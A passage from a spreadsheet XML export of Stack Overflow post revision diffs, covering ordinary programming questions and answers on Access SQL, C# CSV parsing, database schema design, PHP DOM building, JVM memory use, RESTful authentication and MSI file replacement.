  strSQL = "UPDATE MyTable SET MyField='" &amp;amp; String(1000,"A") &amp;amp; "'"_x000D_
  CurrentDb.Execute strSQL, dbFailOnError_x000D_
End Sub_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I don't use parameters in saved queries &lt;em&gt;except&lt;/em&gt; when I need to pull a value from a control on a form to be used in a saved query.&lt;/p&gt; _x000D_
 &lt;p&gt; Now, my answer might not be good if your back end is not Jet or if there's something about the actual criteria and structure of your saved query that makes it important to use a saved query instead of simply using on-the-fly SQL. But you've provided virtually no information (including omitting the SQL of the querydef you're executing), so it's rather difficult to supply any kind of helpful answer.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Um, what are you trying to do? Why are you using parameters? Why not just execute SQL in code, like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Public Sub TestMemoField_x000D_
  Dim strSQL As String_x000D_
_x000D_
  strSQL = "UPDATE MyTable SET MyField='" &amp;amp; String(1000,"A") &amp;amp; "'"_x000D_
  CurrentDb.Execute strSQL, dbFailOnError_x000D_
End Sub_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I don't use parameters in saved queries &lt;em&gt;except&lt;/em&gt; when I need to pull a value from a control on a form to be used in a saved query.&lt;/p&gt; _x000D_
 &lt;p&gt; Now, my answer might not be good if your back end is not Jet or if there's something about the actual criteria and structure of your saved query that makes it important to use a saved query instead of simply using on-the-fly SQL. But you've provided virtually no information (including omitting the SQL of the querydef you're executing), so it's rather difficult to supply any kind of helpful answer.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt;-- &lt;/span&gt;&lt;br&gt;&lt;span class="diff-add"&gt; David W. Fenton&lt;/span&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://dfenton.com/DFA/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;David Fenton Associates&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am using C#.net &lt;span class="diff-delete"&gt;for parsing csv.&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; i&lt;/span&gt; used Regular &lt;span class="diff-delete"&gt;expression&lt;/span&gt; to find&lt;span class="diff-delete"&gt; combition&lt;/span&gt; "," and read string &lt;span class="diff-delete"&gt;it i&lt;/span&gt; get my header counts equal to Match count.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;now&lt;/span&gt; this will not work &lt;span class="diff-delete"&gt;in i&lt;/span&gt; have a &lt;span class="diff-delete"&gt;value&lt;/span&gt; like&lt;span class="diff-delete"&gt;,&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;"a",""b","x"" my&lt;/span&gt; output is&lt;span class="diff-delete"&gt; all three letters&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; "a" "b" "x"&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; but &lt;span class="diff-delete"&gt;i&lt;/span&gt; want &lt;span class="diff-delete"&gt;result as &lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; "a" and next result will ""b","x""&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;is&lt;/span&gt; there any regex or any other logic &lt;span class="diff-delete"&gt;i&lt;/span&gt; can use for this &lt;span class="diff-delete"&gt;??&lt;/span&gt;?&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Thanks,&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am&lt;span class="diff-add"&gt; trying to&lt;/span&gt; using C#.net &lt;span class="diff-add"&gt;to parse CSV&lt;/span&gt;.&lt;span class="diff-add"&gt; I&lt;/span&gt; used Regular &lt;span class="diff-add"&gt;expressions&lt;/span&gt; to find "," and read string &lt;span class="diff-add"&gt;if I&lt;/span&gt; get my header counts equal to Match count.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Now&lt;/span&gt; this will not work &lt;span class="diff-add"&gt;if I&lt;/span&gt; have a &lt;span class="diff-add"&gt;values&lt;/span&gt; like&lt;span class="diff-add"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;"a"&lt;/span&gt;,&lt;span class="hljs-string"&gt;""&lt;/span&gt;b&lt;span class="hljs-string"&gt;","&lt;/span&gt;x&lt;span class="hljs-string"&gt;","&lt;/span&gt;y&lt;span class="hljs-string"&gt;""&lt;/span&gt;,&lt;span class="hljs-string"&gt;"c"&lt;/span&gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;my&lt;/span&gt; output is:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;"a"&lt;/span&gt;_x000D_
&lt;span class="hljs-string"&gt;"b"&lt;/span&gt;_x000D_
&lt;span class="hljs-string"&gt;"x"&lt;/span&gt;_x000D_
&lt;span class="hljs-string"&gt;"y"&lt;/span&gt;_x000D_
&lt;span class="hljs-string"&gt;"c"&lt;/span&gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; but &lt;span class="diff-add"&gt;what I&lt;/span&gt; want &lt;span class="diff-add"&gt;is&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;"a"&lt;/span&gt;_x000D_
&lt;span class="hljs-string"&gt;""&lt;/span&gt;b&lt;span class="hljs-string"&gt;","&lt;/span&gt;x&lt;span class="hljs-string"&gt;","&lt;/span&gt;y&lt;span class="hljs-string"&gt;""&lt;/span&gt;_x000D_
&lt;span class="hljs-string"&gt;"c"&lt;/span&gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Is&lt;/span&gt; there any regex or any other logic &lt;span class="diff-add"&gt;I&lt;/span&gt; can use for this ?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>xyz</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h2&gt;Dont store it. Calculate it!&lt;/h2&gt; _x000D_
 &lt;p&gt; My recommended way of storing %age based rates/interest is:&lt;/p&gt; _x000D_
 &lt;p&gt; You should have a table 'VAT_param' like&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Interest rate | Effective from (date) | Effective Till(date)&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I believe,&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; "&lt;strong&gt;Anything that can be calculated,&lt;/strong&gt; &lt;strong&gt;should not be saved"&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; Especially in such cases where you need to calculate values based on %age of others (like taxes, interest, etc.) &lt;span class="diff-delete"&gt;Don't&lt;/span&gt; let the Time-Space &lt;span class="diff-delete"&gt;trade-off&lt;/span&gt; dodge you. You'll bless yourself later for spending time over space.&lt;/p&gt; _x000D_
 &lt;p&gt; Then the VAT should be neatly calculated based on the effective rate during the period, based on the Invoice date. It will&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;strong&gt;Ensure least redundancy&lt;/strong&gt; (pls. never talk about old tables or new tables.. over a few years you'll start pulling your hairs if the interest rate changes once an year)&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Have a &lt;strong&gt;centralised single-pivot&lt;/strong&gt; to control the rate. Your VAT_param table.&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h2&gt;Dont store it. Calculate it!&lt;/h2&gt; _x000D_
 &lt;p&gt; My recommended way of storing %age based rates/interest is:&lt;/p&gt; _x000D_
 &lt;p&gt; You should have a table 'VAT_param' like&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Interest rate | Effective from (date) | Effective Till(date)&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I believe,&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; "&lt;strong&gt;Anything that can be calculated,&lt;/strong&gt; &lt;strong&gt;should not be saved"&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; Especially in such cases where you need to calculate values based on %age of others (like taxes, interest, etc.) &lt;span class="diff-add"&gt;DOnt&lt;/span&gt; let the Time-Space &lt;span class="diff-add"&gt;tradeoff&lt;/span&gt; dodge you. You'll bless yourself later for spending time over space.&lt;/p&gt; _x000D_
 &lt;p&gt; Then the VAT should be neatly calculated based on the effective rate during the period, based on the Invoice date. It will&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;strong&gt;Ensure least redundancy&lt;/strong&gt; (pls. never talk about old tables or new tables.. over a few years you'll start pulling your hairs if the interest rate changes once an year)&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Have a &lt;strong&gt;centralised single-pivot&lt;/strong&gt; to control the rate. Your VAT_param table.&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>M.N</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre class="lang-sql prettyprint-override"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;CREATE TABLE T_PRODUCT (_x000D_
  NAME        NVARCHAR(50),_x000D_
  DESCRIPTION NTEXT,_x000D_
  PRICE       NUMBER(18, 2)_x000D_
)_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre class="lang-sql prettyprint-override"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;    CREATE TABLE T_PRODUCT (_x000D_
      NAME_EN        NVARCHAR(50),_x000D_
      NAME_DE        NVARCHAR(50),_x000D_
      NAME_SP        NVARCHAR(50),_x000D_
      DESCRIPTION_EN NTEXT,_x000D_
      DESCRIPTION_DE NTEXT,_x000D_
      DESCRIPTION_SP NTEXT,_x000D_
      PRICE          NUMBER(18,2)_x000D_
    )_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre class="lang-sql prettyprint-override"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;    CREATE TABLE T_PRODUCT (_x000D_
      NAME_FK        int,_x000D_
      DESCRIPTION_FK int,_x000D_
      PRICE          NUMBER(18, 2)_x000D_
    )_x000D_
_x000D_
    CREATE TABLE T_TRANSLATION (_x000D_
      TRANSLATION_ID,_x000D_
      TEXT_EN NTEXT,_x000D_
      TEXT_DE NTEXT,_x000D_
      TEXT_SP NTEXT_x000D_
    )_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre class="lang-sql prettyprint-override"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;    CREATE TABLE T_PRODUCT (_x000D_
      NAME_FK        int,_x000D_
      DESCRIPTION_FK int,_x000D_
      PRICE          NUMBER(18, 2)_x000D_
    )_x000D_
_x000D_
    CREATE TABLE T_TRANSLATION (_x000D_
      TRANSLATION_ID_x000D_
    )_x000D_
_x000D_
    CREATE TABLE T_TRANSLATION_ENTRY (_x000D_
      TRANSLATION_FK,_x000D_
      LANGUAGE_FK,_x000D_
      TRANSLATED_TEXT NTEXT_x000D_
    )_x000D_
_x000D_
    CREATE TABLE T_TRANSLATION_LANGUAGE (_x000D_
      LANGUAGE_ID,_x000D_
      LANGUAGE_CODE CHAR(2)_x000D_
    )_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;CREATE TABLE T_PRODUCT (_x000D_
  NAME        NVARCHAR(50),_x000D_
  DESCRIPTION NTEXT,_x000D_
  PRICE       NUMBER(18, 2)_x000D_
)_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;    CREATE TABLE T_PRODUCT (_x000D_
      NAME_EN        NVARCHAR(50),_x000D_
      NAME_DE        NVARCHAR(50),_x000D_
      NAME_SP        NVARCHAR(50),_x000D_
      DESCRIPTION_EN NTEXT,_x000D_
      DESCRIPTION_DE NTEXT,_x000D_
      DESCRIPTION_SP NTEXT,_x000D_
      PRICE          NUMBER(18,2)_x000D_
    )_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;    CREATE TABLE T_PRODUCT (_x000D_
      NAME_FK        int,_x000D_
      DESCRIPTION_FK int,_x000D_
      PRICE          NUMBER(18, 2)_x000D_
    )_x000D_
_x000D_
    CREATE TABLE T_TRANSLATION (_x000D_
      TRANSLATION_ID,_x000D_
      TEXT_EN NTEXT,_x000D_
      TEXT_DE NTEXT,_x000D_
      TEXT_SP NTEXT_x000D_
    )_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;    CREATE TABLE T_PRODUCT (_x000D_
      NAME_FK        int,_x000D_
      DESCRIPTION_FK int,_x000D_
      PRICE          NUMBER(18, 2)_x000D_
    )_x000D_
_x000D_
    CREATE TABLE T_TRANSLATION (_x000D_
      TRANSLATION_ID_x000D_
    )_x000D_
_x000D_
    CREATE TABLE T_TRANSLATION_ENTRY (_x000D_
      TRANSLATION_FK,_x000D_
      LANGUAGE_FK,_x000D_
      TRANSLATED_TEXT NTEXT_x000D_
    )_x000D_
_x000D_
    CREATE TABLE T_TRANSLATION_LANGUAGE (_x000D_
      LANGUAGE_ID,_x000D_
      LANGUAGE_CODE CHAR(2)_x000D_
    )_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user247702</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Sometimes, while I am debugging a &lt;span class="diff-delete"&gt;C#&lt;/span&gt; application, I will hit a break point and when I try to continue, step or step into, it just does nothing. &lt;span class="diff-delete"&gt;The&lt;/span&gt; yellow line highlighting the current line goes away, but it never reaches the next line. The app is still frozen like I am on a breakpoint and I can do nothing but hit the stop debugging button and restart. This doesn't happen all the time, but once it starts on an app it seems like it always happens after that for that app. I have found that adding the following code just before the class declaration "fixes" the problem for that app, but am very curious as to why this is happening.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;[System.Diagnostics.DebuggerDisplay(&lt;span class="diff-delete"&gt;"Form1"&lt;/span&gt;)]&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Additional details: I have not noticed any kind of pattern as to what the particular line does when it freezes. Most of the apps I write use threading, so there is a decent chance this is happening within a thread every time.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Sometimes, while I am debugging a &lt;span class="diff-add"&gt;c#&lt;/span&gt; application, I will hit a break point and when I try to continue, step or step into, it just does nothing. &lt;span class="diff-add"&gt; The&lt;/span&gt; yellow line highlighting the current line goes away, but it never reaches the next line. The app is still frozen like I am on a breakpoint and I can do nothing but hit the stop debugging button and restart. This doesn't happen all the time, but once it starts on an app it seems like it always happens after that for that app. I have found that adding the following code just before the class declaration "fixes" the problem for that app, but am very curious as to why this is happening.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;[System.Diagnostics.DebuggerDisplay(&lt;span class="diff-add"&gt;"Form1"&lt;/span&gt;)]&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Additional details: I have not noticed any kind of pattern as to what the particular line does when it freezes. Most of the apps I write use threading, so there is a decent chance this is happening within a thread every time.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php_x000D_
$nested_array = array();_x000D_
$nested_array[] = array('name' =&amp;gt; 'foo', 'depth' =&amp;gt; 0);_x000D_
$nested_array[] = array('name' =&amp;gt; 'bar', 'depth' =&amp;gt; 0);_x000D_
$nested_array[] = array('name' =&amp;gt; 'sub-bar', 'depth' =&amp;gt; 1);_x000D_
$nested_array[] = array('name' =&amp;gt; 'sub-sub-bar', 'depth' =&amp;gt; 2);_x000D_
$nested_array[] = array('name' =&amp;gt; 'sub-bar2', 'depth' =&amp;gt; 1);_x000D_
$nested_array[] = array('name' =&amp;gt; 'sub-sub-bar3', 'depth' =&amp;gt; 3);_x000D_
$nested_array[] = array('name' =&amp;gt; 'sub-sub3', 'depth' =&amp;gt; 2);_x000D_
$nested_array[] = array('name' =&amp;gt; 'baz', 'depth' =&amp;gt; 0);_x000D_
_x000D_
$doc = new DOMDocument('1.0', 'iso-8859-1');_x000D_
$doc-&amp;gt;formatOutput = true;_x000D_
$rootNode = $doc-&amp;gt;createElement('div');_x000D_
$doc-&amp;gt;appendChild($rootNode);_x000D_
_x000D_
$rootList = $doc-&amp;gt;createElement('ul');_x000D_
$rootNode-&amp;gt;appendChild($rootList);_x000D_
_x000D_
$listStack = array($rootList); // Stack of created XML list elements_x000D_
$depth = 0; // Current depth_x000D_
_x000D_
foreach ($nested_array as $nael) {_x000D_
    while ($depth &amp;lt; $nael['depth']) {_x000D_
        // New list element_x000D_
        if ($listStack[$depth]-&amp;gt;lastChild == null) {_x000D_
            // More than one level at once_x000D_
            $li = $doc-&amp;gt;createElement('li');_x000D_
            $listStack[$depth]-&amp;gt;appendChild($li);_x000D_
        }_x000D_
        $listEl = $doc-&amp;gt;createElement('ul');_x000D_
        $listStack[$depth]-&amp;gt;lastChild-&amp;gt;appendChild($listEl);_x000D_
        array_push($listStack, $listEl);_x000D_
        _x000D_
        $depth++;_x000D_
    }_x000D_
    _x000D_
    while ($depth &amp;gt; $nael['depth']) {_x000D_
        array_pop($listStack);_x000D_
        $depth--;_x000D_
    }_x000D_
    _x000D_
    // Add the element itself_x000D_
    $li = $doc-&amp;gt;createElement('li');_x000D_
    $li-&amp;gt;appendChild($doc-&amp;gt;createTextNode($nael['name']));_x000D_
    $listStack[$depth]-&amp;gt;appendChild($li);_x000D_
}_x000D_
_x000D_
echo $doc-&amp;gt;saveXML();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
$nested_array = array();_x000D_
$nested_array[] = array('name' =&amp;gt; 'foo', 'depth' =&amp;gt; 0);_x000D_
$nested_array[] = array('name' =&amp;gt; 'bar', 'depth' =&amp;gt; 0);_x000D_
$nested_array[] = array('name' =&amp;gt; 'sub-bar', 'depth' =&amp;gt; 1);_x000D_
$nested_array[] = array('name' =&amp;gt; 'sub-sub-bar', 'depth' =&amp;gt; 2);_x000D_
$nested_array[] = array('name' =&amp;gt; 'sub-bar2', 'depth' =&amp;gt; 1);_x000D_
$nested_array[] = array('name' =&amp;gt; 'sub-sub-bar3', 'depth' =&amp;gt; 3);_x000D_
$nested_array[] = array('name' =&amp;gt; 'sub-sub3', 'depth' =&amp;gt; 2);_x000D_
$nested_array[] = array('name' =&amp;gt; 'baz', 'depth' =&amp;gt; 0);_x000D_
_x000D_
$doc = new DOMDocument('1.0', 'iso-8859-1');_x000D_
$doc-&amp;gt;formatOutput = true;_x000D_
$rootNode = $doc-&amp;gt;createElement('div');_x000D_
$doc-&amp;gt;appendChild($rootNode);_x000D_
_x000D_
$rootList = $doc-&amp;gt;createElement('ul');_x000D_
$rootNode-&amp;gt;appendChild($rootList);_x000D_
_x000D_
$listStack = array($rootList); // Stack of created XML list elements_x000D_
$depth = 0; // Current depth_x000D_
_x000D_
foreach ($nested_array as $nael) {_x000D_
    while ($depth &amp;lt; $nael['depth']) {_x000D_
        // New list element_x000D_
        if ($listStack[$depth]-&amp;gt;lastChild == null) {_x000D_
            // More than one level at once_x000D_
            $li = $doc-&amp;gt;createElement('li');_x000D_
            $listStack[$depth]-&amp;gt;appendChild($li);_x000D_
        }_x000D_
        $listEl = $doc-&amp;gt;createElement('ul');_x000D_
        $listStack[$depth]-&amp;gt;lastChild-&amp;gt;appendChild($listEl);_x000D_
        array_push($listStack, $listEl);_x000D_
        _x000D_
        $depth++;_x000D_
    }_x000D_
    _x000D_
    while ($depth &amp;gt; $nael['depth']) {_x000D_
        array_pop($listStack);_x000D_
        $depth--;_x000D_
    }_x000D_
    _x000D_
    // Add the element itself_x000D_
    $li = $doc-&amp;gt;createElement('li');_x000D_
    $li-&amp;gt;appendChild($doc-&amp;gt;createTextNode($nael['name']));_x000D_
    $listStack[$depth]-&amp;gt;appendChild($li);_x000D_
}_x000D_
_x000D_
echo $doc-&amp;gt;saveXML();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>phihag</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've be working with a Java application run through the command-line. It deals with XML files, specially the dblp.xml database which has more than 400MB.&lt;/p&gt; _x000D_
 &lt;p&gt; I was using JVM 5 and my app needed sort of 600-700MB of memory to processe the dblp.xml. After updating to JVM 6, it starting needing more than 1gb of memory (something I don't have), although it runs a bit faster.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm preety sure of the memory consumption difference, because I've already tested both again and again in this same computer. Resulting in the same difference of memory consumption.&lt;/p&gt; _x000D_
 &lt;p&gt; I didn't set any special parameters, just -Xmx800M or -Xmx1000M. &lt;span class="diff-delete"&gt;Any&lt;/span&gt; one have an idea why this occurs? I really wanted to use JVM 6, because in my production server it is the JVM in use, and I'm not quite able to change easily.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've be working with a Java application run through the command-line. It deals with XML files, specially the dblp.xml database which has more than 400MB.&lt;/p&gt; _x000D_
 &lt;p&gt; I was using JVM 5 and my app needed sort of 600-700MB of memory to processe the dblp.xml. After updating to JVM 6, it starting needing more than 1gb of memory (something I don't have), although it runs a bit faster.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm preety sure of the memory consumption difference, because I've already tested both again and again in this same computer. Resulting in the same difference of memory consumption.&lt;/p&gt; _x000D_
 &lt;p&gt; I didn't set any special parameters, just -Xmx800M or -Xmx1000M. &lt;span class="diff-add"&gt;Running with Ubuntu Hardy Heron on a dual core 1.7ghz, with 1,5gb of memory Using only the top/ps commands to measure&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Any&lt;/span&gt; one have an idea why this occurs? I really wanted to use JVM 6, because in my production server it is the JVM in use, and I'm not quite able to change easily.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Felipe Hummel</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What does RESTful Authentication mean and how does it work. I can't find a good overview on google. My only understanding is that you pass the session key (remeberal) in the URL, but this could be horribly wrong.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What does RESTful Authentication mean and how does it work. I can't find a good overview on google. My only understanding is that you pass the session key (remeberal) in the URL, but this could be horribly wrong.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks for your input!&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Joe Frambach</t>
  </si>
  <si>
    <t>Elnur Abdurrakhimov</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Many of our customers have access to InstallShield, WISE or AdminStudio. These aren't a problem. I'm hoping there is some way I can provide our smaller customers &lt;strong&gt;without access to commercial repackaging tools&lt;/strong&gt; a freely available set of tools and steps to do the file replacement themselves.&lt;/p&gt; _x000D_
 &lt;p&gt; Only need to replace a single configuration file inside a compressed MSI, the target user can be assumed to already have Orca installed, know how to use this to customize the Property table (to embed license details for GPO deployment) and have generated an MST file.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The file that needs to be replaced is less than 1kb.&lt;/strong&gt; So if rather than creating a CAB file I can leave it externally in the same folder as the MSI, or stream it directly into the binary table using Orca then that would be great! &lt;em&gt;= One less step for the customer ;)&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;EDIT&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/strong&gt; suggestions below don't quite work, when adding a medium with no cabinet file I get "Error 2920. Source directory not specified for file " However it &lt;em&gt;&lt;span class="diff-delete"&gt;does&lt;/span&gt;&lt;/em&gt; work if I use a cabinet file. Suggestions?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;br&gt;&lt;br&gt; &lt;strong&gt;Disclaimer&lt;/strong&gt;: &lt;em&gt;this is very similar to &lt;a href="http://stackoverflow.com/questions/126562/how-to-replace-a-file-in-a-msi-installer"&gt;another question&lt;/a&gt; but both questions and answers in that thread are not clear.&lt;/em&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
